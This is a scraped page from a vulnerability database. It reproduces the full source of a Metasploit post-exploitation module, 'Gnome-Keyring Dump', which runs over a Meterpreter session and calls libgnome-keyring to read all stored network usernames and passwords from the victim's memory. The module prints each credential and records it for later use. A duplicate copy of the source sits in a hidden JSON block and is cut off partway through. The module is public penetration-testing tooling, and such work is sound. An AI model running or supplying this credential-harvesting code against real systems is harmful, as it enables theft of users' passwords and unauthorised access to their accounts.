<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8"/>
    <link rel="manifest" href="/static/manifest.json">
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    <meta name="referrer" content="origin"/>
    <title>Gnome-Keyring Dump</title>
    <meta name="msvalidate.01" content="C47DF06B377F79B10566A1165E3758DC" />
    <meta name="description" content="Use libgnome-keyring to extract network passwords for the current user. This module does not require root privileges to..." />
    <meta name="robots" content="index,follow" />
    <meta name="keywords" content="Rapid7, MSF:POST/LINUX/GATHER/GNOME_KEYRING_DUMP, metasploit, exploit, vulnerability, vulners.com" />
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="google-site-verification" content="OYcpyPp414ZaMssSsabVumz8Tq0-oBVlLkLWhZGSVpQ" />
    <meta name='yandex-verification' content='5d7e976a4ee2b0b8' />
    <meta name="yandex-verification" content="4084c113ad1c8ff8" />
    <meta name='wmail-verification' content='578564cc815cbbb4d3c2b665a9b881c0' />
    <meta name="alexaVerifyID" content="XamyzRAFMnH2oWW1S1uH6zLq82Y"/>
    <meta name = "baidu-site-verification" content = "zS7nc5WUS0" />
    <meta name = "sogou_site_verification" content = "CnCG04rdFd" />
    <meta name="facebook-domain-verification" content="inaqycohk8mzjyvjummi5t72w64ztg" />

    
<!-- Schema.org markup for Google+ -->
<meta itemprop="name" content="Gnome-Keyring Dump">
<meta itemprop="description" content="Use libgnome-keyring to extract network passwords for the current user. This module does not require root privileges to...">
<meta itemprop="image" content="https://vulners.com/static/img/metasploit.png">

<!-- Twitter Card data -->
<meta name="twitter:card" content="summary">
<meta name="twitter:site" content="@VulnersCom">
<meta name="twitter:title" content="Gnome-Keyring Dump">
<meta name="twitter:description" content="Use libgnome-keyring to extract network passwords for the current user. This module does not require root privileges to...">
<meta name="twitter:creator" content="@VulnersCom">
<!-- Twitter summary card with large image must be at least 280x150px -->
<meta name="twitter:image:src" content="https://vulners.com/static/img/metasploit.png">

<!-- Open Graph data -->
<meta property="og:title" content="Gnome-Keyring Dump" />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://vulners.com/metasploit/MSF:POST/LINUX/GATHER/GNOME_KEYRING_DUMP/" />
<meta property="og:image" content="https://vulners.com/static/img/metasploit.png" />
<meta property="og:description" content="Use libgnome-keyring to extract network passwords for the current user. This module does not require root privileges to..." />
<meta property="og:site_name" content="Vulners Database" />
<meta property="article:published_time" content="2017-04-21T20:17:18" />
<meta property="article:modified_time" content="2017-07-24T13:26:21" />
<meta property="article:section" content="metasploit" />
<meta property="article:tag" content="Rapid7, MSF:POST/LINUX/GATHER/GNOME_KEYRING_DUMP, metasploit, exploit, vulnerability, vulners.com" />
<meta property="article:author" content="Rapid7" />
<meta property="article:authorUrl" content="https://vulners.com/search?query=reporter:Rapid7" />
<meta property="fb:admins" content="248808148790772" />

<link href="/static/css/robots/robots.css" rel="stylesheet" type="text/css" />


    <!-- Google Tag Manager -->
    <script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
            new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
        j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
        'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
    })(window,document,'script','dataLayer','GTM-TB9V5FP');</script>
    <!-- End Google Tag Manager -->

    <!-- Facebook Pixel Code -->
    <script>
        !function(f,b,e,v,n,t,s)
        {if(f.fbq)return;n=f.fbq=function(){n.callMethod?
            n.callMethod.apply(n,arguments):n.queue.push(arguments)};
            if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';
            n.queue=[];t=b.createElement(e);t.async=!0;
            t.src=v;s=b.getElementsByTagName(e)[0];
            s.parentNode.insertBefore(t,s)}(window, document,'script',
            'https://connect.facebook.net/en_US/fbevents.js');
        fbq('init', '871142820150272');
        fbq('track', 'PageView');
    </script>
    <noscript><img height="1" width="1" style="display:none"
                   src="https://www.facebook.com/tr?id=871142820150272&ev=PageView&noscript=1"
    /></noscript>
    <!-- End Facebook Pixel Code -->


</head>

<body>
<!-- Google Tag Manager (noscript) -->
<noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-TB9V5FP" height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>
<!-- End Google Tag Manager (noscript) -->

<input type="hidden" name="csrfmiddlewaretoken" value="JRTau68IzGlKXneGnBBdz5Rpa6TcCJg3Yh59u4cY889qEtB1c8gzLuIiBkrW6JLh">
<div id="body">
    <div class="vl-loader-page">
        <div class="vl-loader"><span></span></div>
    </div>
    
    <div class="vulners-robots-markup">
        <div class="vulners-header-search-bar-wrapper">
            <div class="vulners-header-search-bar">
                <img src="/static/img/logo_center.png" style="display: none; visibility: hidden;"/>
                <div>
                    <div class="vulners-header-bar-navigation">
                        <div class="vulners-header-bar-navigation-inner"><a class="vulners-header-search-bar-logo" href="/"><img src="/static/img/logo_small.png"></a>
                            <div class="vulners-header-bar-navigation-text">
                                <div>
                                    <div class="vulners-search-field">
                                        <div class="vulners-search-field-text">Search...</div>
                                        <input type="text" autocomplete="off" value="" id="undefined-Search-undefined-10044">
                                        <div>
                                            <hr>
                                        </div>
                                    </div>
                                </div>
                            </div>
                            <div class="vulners-header-bar-navigation-buttons-block">
                                <button class="vulners-header-bar-icon-settigs" tabindex="0" type="button">
                                    <div>
                                        <div>
                                            <div></div><span>Search settings</span></div>
                                        <svg viewBox="0 0 24 24">
                                            <path d="M3 17v2h6v-2H3zM3 5v2h10V5H3zm10 16v-2h8v-2h-8v-2h-2v6h2zM7 9v2H3v2h4v2h2V9H7zm14 4v-2H11v2h10zm-6-4h2V7h4V5h-4V3h-2v6z"></path>
                                        </svg>
                                    </div>
                                </button>
                                <button tabindex="0" type="button">
                                    <div>
                                        <div>
                                            <div></div><span>Search</span></div>
                                        <svg viewBox="0 0 24 24">
                                            <path d="M12 4l-1.41 1.41L16.17 11H4v2h12.17l-5.58 5.59L12 20l8-8z"></path>
                                        </svg>
                                    </div>
                                </button>
                            </div>
                        </div>
                    </div>
                    <div class="float-right">
                        <button tabindex="0" type="button">
                            <div>
                                <div>
                                    <div></div><span>Help</span></div>
                                <svg viewBox="0 0 24 24">
                                    <path d="M11 18h2v-2h-2v2zm1-16C6.48 2 2 6.48 2 12s4.48 10 10 10 10-4.48 10-10S17.52 2 12 2zm0 18c-4.41 0-8-3.59-8-8s3.59-8 8-8 8 3.59 8 8-3.59 8-8 8zm0-14c-2.21 0-4 1.79-4 4h2c0-1.1.9-2 2-2s2 .9 2 2c0 2-3 1.75-3 5h2c0-2.25 3-2.5 3-5 0-2.21-1.79-4-4-4z"></path>
                                </svg>
                            </div>
                        </button>
                        <div class="vulners-login-pane">
                            <div>
                                <button class="vulners-login-btn" tabindex="0" type="button">
                                    <div>
                                        <div>
                                            <div></div><span>Login</span></div>
                                        <svg viewBox="0 0 24 24">
                                            <path d="M12 5.9c1.16 0 2.1.94 2.1 2.1s-.94 2.1-2.1 2.1S9.9 9.16 9.9 8s.94-2.1 2.1-2.1m0 9c2.97 0 6.1 1.46 6.1 2.1v1.1H5.9V17c0-.64 3.13-2.1 6.1-2.1M12 4C9.79 4 8 5.79 8 8s1.79 4 4 4 4-1.79 4-4-1.79-4-4-4zm0 9c-2.67 0-8 1.34-8 4v3h16v-3c0-2.66-5.33-4-8-4z"></path>
                                        </svg>
                                    </div>
                                </button>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
            <div class="vulners-header-search-navigation-tabs-wrapper">
                <div class="vulners-navigation-tabs">
                    <div class="vulners-navigation-tabs-wrapper">
                        <button tabindex="0" type="button">
                            <div>
                                <div>
                                    <!-- react-text: 1756 -->Search
                                    <!-- /react-text -->
                                </div>
                            </div>
                        </button>
                        <button tabindex="0" type="button">
                            <div>
                                <div>
                                    <!-- react-text: 1760 -->audit
                                    <!-- /react-text -->
                                </div>
                            </div>
                        </button>
                        <button tabindex="0" type="button">
                            <div>
                                <div>
                                    <!-- react-text: 1764 -->subscriptions
                                    <!-- /react-text -->
                                </div>
                            </div>
                        </button>
                        <button tabindex="0" type="button">
                            <div>
                                <div>
                                    <!-- react-text: 1768 -->Stats
                                    <!-- /react-text -->
                                </div>
                            </div>
                        </button>
                        <button tabindex="0" type="button">
                            <div>
                                <div>
                                    <!-- react-text: 1772 -->Contacts
                                    <!-- /react-text -->
                                </div>
                            </div>
                        </button>
                        <button tabindex="0" type="button">
                            <div>
                                <div>
                                    <!-- react-text: 1776 -->Blog
                                    <!-- /react-text -->
                                </div>
                            </div>
                        </button>
                    </div>
                    <div></div>
                    <div></div>
                </div>
            </div>
            <!-- react-empty: 1779 -->
        </div>
        <br>
        <div class="vulners-landing-item-tab">

            <div class="vulners-item-full" id="MSF:POST/LINUX/GATHER/GNOME_KEYRING_DUMP">
                <div>
                    <div class="vulners-card-header"><img size="40" src="/static/img/metasploit.png" class="vulners-icons">
                        <div class="vulners-card-vectors">
                            <div></div>
                            <div class="vulners-vector vulners-card-score">
                                <button tabindex="0" type="button">
                                    <div>
                                        <div>
                                            <div></div><span>AI Score</span></div>
                                        <svg viewBox="0 0 24 24">
                                            <path d="M15 9H9v6h6V9zm-2 4h-2v-2h2v2zm8-2V9h-2V7c0-1.1-.9-2-2-2h-2V3h-2v2h-2V3H9v2H7c-1.1 0-2 .9-2 2v2H3v2h2v2H3v2h2v2c0 1.1.9 2 2 2h2v2h2v-2h2v2h2v-2h2c1.1 0 2-.9 2-2v-2h2v-2h-2v-2h2zm-4 6H7V7h10v10z"></path>
                                        </svg>
                                    </div>
                                </button>
                                <button tabindex="0" type="button">
                                    <div>
                                        <div>
                                            <div></div><span>AI Score</span></div>
                                        <div class="vulners-vector-score"></div>
                                    </div>
                                </button>
                            </div>
                        </div>
                        <div class="vulners-card-header-text">
                            <h1 class="vulners-card-header-title" itemprop=”headline”>Gnome-Keyring Dump</h1>
                            <span class="vulners-card-header-sub-title">2017-04-21T20:17:18</span>
                        </div>
                    </div>
                    <div class="vulners-card-text">
                        <div>
                            <div><span class="vulners-item-id"><b>ID </b>MSF:POST/LINUX/GATHER/GNOME_KEYRING_DUMP</span>
                                <br><span class="vulners-item-type"><b>Type </b>metasploit</span>
                                <br><span class="vulners-item-reporter"><b>Reporter </b>Rapid7</span>
                                <br><span class="vulners-item-modified"><b>Modified </b>2017-07-24T13:26:21</span>
                                <br>
                            </div>
                            <h4>Description</h4>
                            <h2 class="vulners-item-description">
                                <p>Use libgnome-keyring to extract network passwords for the current user. This module does not require root privileges to run.</p>
                            </h2>
                            
                                <div class="vulners-code-highlight">
                                    <pre>
                                        <code>
                                            ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require &#x27;bindata&#x27;

class MetasploitModule &amp;lt; Msf::Post

  def initialize(info={})
    super(update_info(info,
      &#x27;Name&#x27;           =&amp;gt; &#x27;Gnome-Keyring Dump&#x27;,
      &#x27;Description&#x27;    =&amp;gt; %q{
        Use libgnome-keyring to extract network passwords for the current user.
        This module does not require root privileges to run.
      },
      &#x27;Author&#x27;        =&amp;gt; &#x27;Spencer McIntyre&#x27;,
      &#x27;License&#x27;       =&amp;gt; MSF_LICENSE,
      &#x27;Platform&#x27;      =&amp;gt; [ &#x27;linux&#x27; ],
      &#x27;SessionTypes&#x27;  =&amp;gt; [ &#x27;meterpreter&#x27; ]
    ))
  end

  class GList_x64 &amp;lt; BinData::Record
    endian :little
    uint64 :data_ptr
    uint64 :next_ptr
    uint64 :prev_ptr
  end

  class GList_x86 &amp;lt; BinData::Record
    endian :little
    uint32 :data_ptr
    uint32 :next_ptr
    uint32 :prev_ptr
  end

  # https://developer.gnome.org/glib/unstable/glib-Doubly-Linked-Lists.html#GList
  def struct_glist
    session.native_arch == ARCH_X64 ? GList_x64 : GList_x86
  end

  class GnomeKeyringNetworkPasswordData_x64 &amp;lt; BinData::Record
    endian :little
    uint64 :keyring
    uint64 :item_id
    uint64 :protocol
    uint64 :server
    uint64 :object
    uint64 :authtype
    uint64 :port
    uint64 :user
    uint64 :domain
    uint64 :password
  end

  class GnomeKeyringNetworkPasswordData_x86 &amp;lt; BinData::Record
    endian :little
    uint32 :keyring
    uint32 :item_id
    uint32 :protocol
    uint32 :server
    uint32 :object
    uint32 :authtype
    uint32 :port
    uint32 :user
    uint32 :domain
    uint32 :password
  end

  # https://developer.gnome.org/gnome-keyring/stable/gnome-keyring-Network-Passwords.html#GnomeKeyringNetworkPasswordData
  def struct_gnomekeyringnetworkpassworddata
    session.native_arch == ARCH_X64 ? GnomeKeyringNetworkPasswordData_x64 : GnomeKeyringNetworkPasswordData_x86
  end

  def init_railgun_defs
    unless session.railgun.libraries.has_key?(&#x27;libgnome_keyring&#x27;)
      session.railgun.add_library(&#x27;libgnome_keyring&#x27;, &#x27;libgnome-keyring.so.0&#x27;)
    end
    session.railgun.add_function(
      &#x27;libgnome_keyring&#x27;,
      &#x27;gnome_keyring_is_available&#x27;,
      &#x27;BOOL&#x27;,
      [],
      nil,
      &#x27;cdecl&#x27;
    )
    session.railgun.add_function(
      &#x27;libgnome_keyring&#x27;,
      &#x27;gnome_keyring_find_network_password_sync&#x27;,
      &#x27;DWORD&#x27;,
      [
        [&#x27;PCHAR&#x27;, &#x27;user&#x27;, &#x27;in&#x27;],
        [&#x27;PCHAR&#x27;, &#x27;domain&#x27;, &#x27;in&#x27;],
        [&#x27;PCHAR&#x27;, &#x27;server&#x27;, &#x27;in&#x27;],
        [&#x27;PCHAR&#x27;, &#x27;object&#x27;, &#x27;in&#x27;],
        [&#x27;PCHAR&#x27;, &#x27;protocol&#x27;, &#x27;in&#x27;],
        [&#x27;PCHAR&#x27;, &#x27;authtype&#x27;, &#x27;in&#x27;],
        [&#x27;DWORD&#x27;, &#x27;port&#x27;, &#x27;in&#x27;],
        [&#x27;PBLOB&#x27;, &#x27;results&#x27;, &#x27;out&#x27;]
      ],
      nil,
      &#x27;cdecl&#x27;
    )
    session.railgun.add_function(
      &#x27;libgnome_keyring&#x27;,
      &#x27;gnome_keyring_network_password_list_free&#x27;,
      &#x27;VOID&#x27;,
      [[&#x27;LPVOID&#x27;, &#x27;list&#x27;, &#x27;in&#x27;]],
      nil,
      &#x27;cdecl&#x27;
    )
  end

  def get_string(address, chunk_size=64, max_size=256)
    data = &#x27;&#x27;
    begin
      data &amp;lt;&amp;lt; session.railgun.memread(address + data.length, chunk_size)
    end until data.include?(&quot;\x00&quot;) or data.length &amp;gt;= max_size

    if data.include?(&quot;\x00&quot;)
      idx = data.index(&quot;\x00&quot;)
      data = data[0...idx]
    end

    data[0...max_size]
  end

  def get_struct(address, record)
    record = record.new
    record.read(session.railgun.memread(address, record.num_bytes))
    Hash[record.field_names.map { |field| [field, record[field]] }]
  end

  def get_list_entry(address)
    glist_struct = get_struct(address, struct_glist)
    glist_struct[:data] = get_struct(glist_struct[:data_ptr], struct_gnomekeyringnetworkpassworddata)
    glist_struct
  end

  def report_cred(opts)
    service_data = {
      address: opts[:ip],
      port: opts[:port],
      service_name: opts[:service_name],
      protocol: opts[:protocol],
      workspace_id: myworkspace_id
    }

    credential_data = {
      post_reference_name: self.refname,
      session_id: session_db_id,
      origin_type: :session,
      private_data: opts[:password],
      private_type: :password,
      username: opts[:username]
    }.merge(service_data)

    login_data = {
      core: create_credential(credential_data),
      status: Metasploit::Model::Login::Status::UNTRIED,
    }.merge(service_data)

    create_credential_login(login_data)
  end

  def resolve_host(name)
    address = @hostname_cache[name]
    return address unless address.nil?
    vprint_status(&quot;Resolving hostname: #{name}&quot;)
    begin
      address = session.net.resolve.resolve_host(name)[:ip]
    rescue Rex::Post::Meterpreter::RequestError
    end
    @hostname_cache[name] = address
  end

  def resolve_port(service)
    port = {
      &#x27;ftp&#x27;   =&amp;gt; 21,
      &#x27;http&#x27;  =&amp;gt; 80,
      &#x27;https&#x27; =&amp;gt; 443,
      &#x27;sftp&#x27;  =&amp;gt; 22,
      &#x27;ssh&#x27;   =&amp;gt; 22,
      &#x27;smb&#x27;   =&amp;gt; 445
    }[service]
    port.nil? ? 0 : port
  end

  def run
    init_railgun_defs
    @hostname_cache = {}
    libgnome_keyring = session.railgun.libgnome_keyring

    unless libgnome_keyring.gnome_keyring_is_available()[&#x27;return&#x27;]
      fail_with(Failure::NoTarget, &#x27;libgnome-keyring is unavailable&#x27;)
    end

    result = libgnome_keyring.gnome_keyring_find_network_password_sync(
      nil,  # user
      nil,  # domain
      nil,  # server
      nil,  # object
      nil,  # protocol
      nil,  # authtype
      0,    # port
      session.native_arch == ARCH_X64 ? 8 : 4
    )

    list_anchor = result[&#x27;results&#x27;].unpack(session.native_arch == ARCH_X64 ? &#x27;Q&#x27; : &#x27;L&#x27;)[0]
    fail_with(Failure::NoTarget, &#x27;Did not receive a list of passwords&#x27;) if list_anchor == 0

    entry = {:next_ptr =&amp;gt; list_anchor}
    begin
      entry = get_list_entry(entry[:next_ptr])
      pw_data = entry[:data]
      # resolve necessary string fields to non-empty strings or nil
      [:server, :user, :domain, :password, :protocol].each do |field|
        value = pw_data[field]
        pw_data[field] = nil
        next if value == 0
        value = get_string(value)
        next if value.empty?
        pw_data[field] = value
      end

      # skip the entry if we don&#x27;t at least have a username and password
      next if pw_data[:user].nil? or pw_data[:password].nil?

      printable = &#x27;&#x27;
      printable &amp;lt;&amp;lt; &quot;#{pw_data[:protocol]}://&quot; unless pw_data[:protocol].nil?
      printable &amp;lt;&amp;lt; &quot;#{pw_data[:domain]}\\&quot; unless pw_data[:domain].nil?
      printable &amp;lt;&amp;lt; &quot;#{pw_data[:user]}:#{pw_data[:password]}&quot;
      unless pw_data[:server].nil?
        printable &amp;lt;&amp;lt; &quot;@#{pw_data[:server]}&quot;
        printable &amp;lt;&amp;lt; &quot;:#{pw_data[:port]}&quot;
      end
      print_good(printable)

      pw_data[:port] = resolve_port(pw_data[:protocol]) if pw_data[:port] == 0 and !pw_data[:protocol].nil?
      next if pw_data[:port] == 0  # can&#x27;t report without a valid port
      ip_address = resolve_host(pw_data[:server])
      next if ip_address.nil?      # can&#x27;t report without an ip address

      report_cred(
        ip: ip_address,
        port: pw_data[:port],
        protocol: &#x27;tcp&#x27;,
        service_name: pw_data[:protocol],
        username: pw_data[:user],
        password: pw_data[:password]
      )

    end while entry[:next_ptr] != list_anchor and entry[:next_ptr] != 0

    libgnome_keyring.gnome_keyring_network_password_list_free(list_anchor)
  end
end

                                        </code>
                                    </pre>
                                </div>
                            

                            <div></div>
                        </div>
                    </div>
                    <div class="vulners-card-footer">

                        <div class="vulners-card-source">
                            <a rel="nofollow" target="_blank" href="/api/v3/search/id/?id=MSSECURE:4DA3032924D68EA86B45EC29C40137C6" tabindex="0">
                                <div>
                                    <div>
                                        <div></div><span>JSON Vulners Source</span></div>
                                    <svg viewBox="0 0 24 24">
                                        <path d="M9.4 16.6L4.8 12l4.6-4.6L8 6l-6 6 6 6 1.4-1.4zm5.2 0l4.6-4.6-4.6-4.6L16 6l6 6-6 6-1.4-1.4z"></path>
                                    </svg>
                                </div>
                            </a>
                            <a rel="nofollow" target="_blank" href="https://cloudblogs.microsoft.com/microsoftsecure/2018/01/24/now-you-see-me-exposing-fileless-malware/" tabindex="0">
                                <div>
                                    <div>
                                        <div></div><span>Initial Source</span></div>
                                    <svg viewBox="0 0 24 24">
                                        <path d="M3.9 12c0-1.71 1.39-3.1 3.1-3.1h4V7H7c-2.76 0-5 2.24-5 5s2.24 5 5 5h4v-1.9H7c-1.71 0-3.1-1.39-3.1-3.1zM8 13h8v-2H8v2zm9-6h-4v1.9h4c1.71 0 3.1 1.39 3.1 3.1s-1.39 3.1-3.1 3.1h-4V17h4c2.76 0 5-2.24 5-5s-2.24-5-5-5z"></path>
                                    </svg>
                                </div>
                            </a>
                        </div>
                    </div>
                    <div>
                        <div width="3">
                            <div><span></span></div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
        <div class="vulners-references-wrapper">
            <div class="vulners-references">
                <br>
            </div>
        </div>
        <br>
        <div class="vulners-simple-footer-bar">
            <div class="vulners-simple-footer-bar-agreements">
                <h6>All product names, logos, and brands are property of their respective owners. All company, product and service names used in this website are for identification purposes only. Use of these names, logos, and brands does not imply endorsement.If you are an owner of some content and want it to be removed, please mail to content@vulners.com Vulners, 2021</h6></div>
            <div class="float-right">
                <div>Protected by</div><a href="https://wallarm.com/" rel="nofollow" target="_blank"><img class="vulners-wallarm-logo" src="/static/img/wallarm.svg"></a></div>
        </div>
    </div>

</div>

<script type="application/ld+json">
    {
      "@context": "http://schema.org",
      "@type": "NewsArticle",
      "mainEntityOfPage": {
        "@type": "WebPage",
        "@id": "https://vulners.com/metasploit/MSF:POST/LINUX/GATHER/GNOME_KEYRING_DUMP/"
      },
      "headline": "Gnome-Keyring Dump",
      "image": [
        "https://vulners.com/static/img/metasploit.png"],
      "datePublished": "2017-04-21T20:17:18",
      "dateModified": "2017-07-24T13:26:21",
      "author": {
        "@type": "Person",
        "name": "Rapid7"
      },
       "publisher": {
        "@type": "Organization",
        "name": "Vulners",
        "logo": {
          "@type": "ImageObject",
          "url": "https://vulners.com/static/img/logo.png"
        }
      },
      "description": "Use libgnome-keyring to extract network passwords for the current user. This module does not require root privileges to..."
    }
</script>

    <div style="display:none" id="jsonbody">
    {&quot;id&quot;: &quot;MSF:POST/LINUX/GATHER/GNOME_KEYRING_DUMP&quot;, &quot;type&quot;: &quot;metasploit&quot;, &quot;bulletinFamily&quot;: &quot;exploit&quot;, &quot;title&quot;: &quot;Gnome-Keyring Dump&quot;, &quot;description&quot;: &quot;Use libgnome-keyring to extract network passwords for the current user. This module does not require root privileges to run.\n&quot;, &quot;published&quot;: &quot;2017-04-21T20:17:18&quot;, &quot;modified&quot;: &quot;2017-07-24T13:26:21&quot;, &quot;cvss&quot;: {&quot;score&quot;: 0.0, &quot;vector&quot;: &quot;NONE&quot;}, &quot;href&quot;: &quot;&quot;, &quot;reporter&quot;: &quot;Rapid7&quot;, &quot;references&quot;: [], &quot;cvelist&quot;: [], &quot;lastseen&quot;: &quot;2020-10-02T06:11:06&quot;, &quot;viewCount&quot;: 464, &quot;enchantments&quot;: {&quot;score&quot;: {&quot;value&quot;: 0.1, &quot;vector&quot;: &quot;NONE&quot;, &quot;modified&quot;: &quot;2020-10-02T06:11:06&quot;, &quot;rev&quot;: 2}, &quot;dependencies&quot;: {&quot;references&quot;: [{&quot;type&quot;: &quot;redhat&quot;, &quot;idList&quot;: [&quot;RHSA-2021:2322&quot;, &quot;RHSA-2021:2316&quot;, &quot;RHSA-2021:2293&quot;, &quot;RHSA-2021:2314&quot;]}, {&quot;type&quot;: &quot;kitploit&quot;, &quot;idList&quot;: [&quot;KITPLOIT:5958319730822037756&quot;, &quot;KITPLOIT:8607491843204234212&quot;]}, {&quot;type&quot;: &quot;securelist&quot;, &quot;idList&quot;: [&quot;SECURELIST:8E9198BF0E389572981DD1AA05D0708A&quot;]}, {&quot;type&quot;: &quot;xen&quot;, &quot;idList&quot;: [&quot;XSA-374&quot;]}, {&quot;type&quot;: &quot;redhatcve&quot;, &quot;idList&quot;: [&quot;RH:CVE-2020-36387&quot;, &quot;RH:CVE-2018-25015&quot;, &quot;RH:CVE-2021-3573&quot;, &quot;RH:CVE-2019-25045&quot;, &quot;RH:CVE-2020-36386&quot;]}, {&quot;type&quot;: &quot;rapid7blog&quot;, &quot;idList&quot;: [&quot;RAPID7BLOG:205A6422FC31FAE146175228341F2BAA&quot;]}, {&quot;type&quot;: &quot;fedora&quot;, &quot;idList&quot;: [&quot;FEDORA:8D89730AB4B5&quot;, &quot;FEDORA:AE6D630AA059&quot;]}, {&quot;type&quot;: &quot;ubuntu&quot;, &quot;idList&quot;: [&quot;USN-4984-1&quot;, &quot;USN-4982-1&quot;]}, {&quot;type&quot;: &quot;oraclelinux&quot;, &quot;idList&quot;: [&quot;ELSA-2021-2259&quot;]}, {&quot;type&quot;: &quot;ics&quot;, &quot;idList&quot;: [&quot;ICSA-21-131-03&quot;]}], &quot;modified&quot;: &quot;2020-10-02T06:11:06&quot;, &quot;rev&quot;: 2}, &quot;vulnersScore&quot;: 0.1}, &quot;sourceHref&quot;: &quot;https://github.com/rapid7/metasploit-framework/blob/master//modules/post/linux/gather/gnome_keyring_dump.rb&quot;, &quot;sourceData&quot;: &quot;##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire &#x27;bindata&#x27;\n\nclass MetasploitModule &lt; Msf::Post\n\n  def initialize(info={})\n    super(update_info(info,\n      &#x27;Name&#x27;           =&gt; &#x27;Gnome-Keyring Dump&#x27;,\n      &#x27;Description&#x27;    =&gt; %q{\n        Use libgnome-keyring to extract network passwords for the current user.\n        This module does not require root privileges to run.\n      },\n      &#x27;Author&#x27;        =&gt; &#x27;Spencer McIntyre&#x27;,\n      &#x27;License&#x27;       =&gt; MSF_LICENSE,\n      &#x27;Platform&#x27;      =&gt; [ &#x27;linux&#x27; ],\n      &#x27;SessionTypes&#x27;  =&gt; [ &#x27;meterpreter&#x27; ]\n    ))\n  end\n\n  class GList_x64 &lt; BinData::Record\n    endian :little\n    uint64 :data_ptr\n    uint64 :next_ptr\n    uint64 :prev_ptr\n  end\n\n  class GList_x86 &lt; BinData::Record\n    endian :little\n    uint32 :data_ptr\n    uint32 :next_ptr\n    uint32 :prev_ptr\n  end\n\n  # https://developer.gnome.org/glib/unstable/glib-Doubly-Linked-Lists.html#GList\n  def struct_glist\n    session.native_arch == ARCH_X64 ? GList_x64 : GList_x86\n  end\n\n  class GnomeKeyringNetworkPasswordData_x64 &lt; BinData::Record\n    endian :little\n    uint64 :keyring\n    uint64 :item_id\n    uint64 :protocol\n    uint64 :server\n    uint64 :object\n    uint64 :authtype\n    uint64 :port\n    uint64 :user\n    uint64 :domain\n    uint64 :password\n  end\n\n  class GnomeKeyringNetworkPasswordData_x86 &lt; BinData::Record\n    endian :little\n    uint32 :keyring\n    uint32 :item_id\n    uint32 :protocol\n    uint32 :server\n    uint32 :object\n    uint32 :authtype\n    uint32 :port\n    uint32 :user\n    uint32 :domain\n    uint32 :password\n  end\n\n  # https://developer.gnome.org/gnome-keyring/stable/gnome-keyring-Network-Passwords.html#GnomeKeyringNetworkPasswordData\n  def struct_gnomekeyringnetworkpassworddata\n    session.native_arch == ARCH_X64 ? GnomeKeyringNetworkPasswordData_x64 : GnomeKeyringNetworkPasswordData_x86\n  end\n\n  def init_railgun_defs\n    unless session.railgun.libraries.has_key?(&#x27;libgnome_keyring&#x27;)\n      session.railgun.add_library(&#x27;libgnome_keyring&#x27;, &#x27;libgnome-keyring.so.0&#x27;)\n    end\n    session.railgun.add_function(\n      &#x27;libgnome_keyring&#x27;,\n      &#x27;gnome_keyring_is_available&#x27;,\n      &#x27;BOOL&#x27;,\n      [],\n      nil,\n      &#x27;cdecl&#x27;\n    )\n    session.railgun.add_function(\n      &#x27;libgnome_keyring&#x27;,\n      &#x27;gnome_keyring_find_network_password_sync&#x27;,\n      &#x27;DWORD&#x27;,\n      [\n        [&#x27;PCHAR&#x27;, &#x27;user&#x27;, &#x27;in&#x27;],\n        [&#x27;PCHAR&#x27;, &#x27;domain&#x27;, &#x27;in&#x27;],\n        [&#x27;PCHAR&#x27;, &#x27;server&#x27;, &#x27;in&#x27;],\n        [&#x27;PCHAR&#x27;, &#x27;object&#x27;, &#x27;in&#x27;],\n        [&#x27;PCHAR&#x27;, &#x27;protocol&#x27;, &#x27;in&#x27;],\n        [&#x27;PCHAR&#x27;, &#x27;authtype&#x27;, &#x27;in&#x27;],\n        [&#x27;DWORD&#x27;, &#x27;port&#x27;, &#x27;in&#x27;],\n        [&#x27;PBLOB&#x27;, &#x27;results&#x27;, &#x27;out&#x27;]\n      ],\n      nil,\n      &#x27;cdecl&#x27;\n    )\n    session.railgun.add_function(\n      &#x27;libgnome_keyring&#x27;,\n      &#x27;gnome_keyring_network_password_list_free&#x27;,\n      &#x27;VOID&#x27;,\n      [[&#x27;LPVOID&#x27;, &#x27;list&#x27;, &#x27;in&#x27;]],\n      nil,\n      &#x27;cdecl&#x27;\n    )\n  end\n\n  def get_string(address, chunk_size=64, max_size=256)\n    data = &#x27;&#x27;\n    begin\n      data &lt;&lt; session.railgun.memread(address + data.length, chunk_size)\n    end until data.include?(\&quot;\\x00\&quot;) or data.length &gt;= max_size\n\n    if data.include?(\&quot;\\x00\&quot;)\n      idx = data.index(\&quot;\\x00\&quot;)\n      data = data[0...idx]\n    end\n\n    data[0...max_size]\n  end\n\n  def get_struct(address, record)\n    record = record.new\n    record.read(session.railgun.memread(address, record.num_bytes))\n    Hash[record.field_names.map { |field| [field, record[field]] }]\n  end\n\n  def get_list_entry(address)\n    glist_struct = get_struct(address, struct_glist)\n    glist_struct[:data] = get_struct(glist_struct[:data_ptr], struct_gnomekeyringnetworkpassworddata)\n    glist_struct\n  end\n\n  def report_cred(opts)\n    service_data = {\n      address: opts[:ip],\n      port: opts[:port],\n      service_name: opts[:service_name],\n      protocol: opts[:protocol],\n      workspace_id: myworkspace_id\n    }\n\n    credential_data = {\n      post_reference_name: self.refname,\n      session_id: session_db_id,\n      origin_type: :session,\n      private_data: opts[:password],\n      private_type: :password,\n      username: opts[:username]\n    }.merge(service_data)\n\n    login_data = {\n      core: create_credential(credential_data),\n      status: Metasploit::Model::Login::Status::UNTRIED,\n    }.merge(service_data)\n\n    create_credential_login(login_data)\n  end\n\n  def resolve_host(name)\n    address = @hostname_cache[name]\n    return address unless address.nil?\n    vprint_status(\&quot;Resolving hostname: #{name}\&quot;)\n    begin\n      address = session.net.resolve.resolve_host(name)[:ip]\n    rescue 